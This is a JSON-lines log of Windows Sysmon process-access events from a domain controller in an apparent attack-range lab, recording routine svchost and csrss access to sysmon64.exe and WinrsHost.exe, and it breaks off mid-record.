{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2682,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-0010C6CA0400}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-0010C6CA0400}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2683,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2684,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2685,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2686,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2687,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2688,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2689,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2690,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 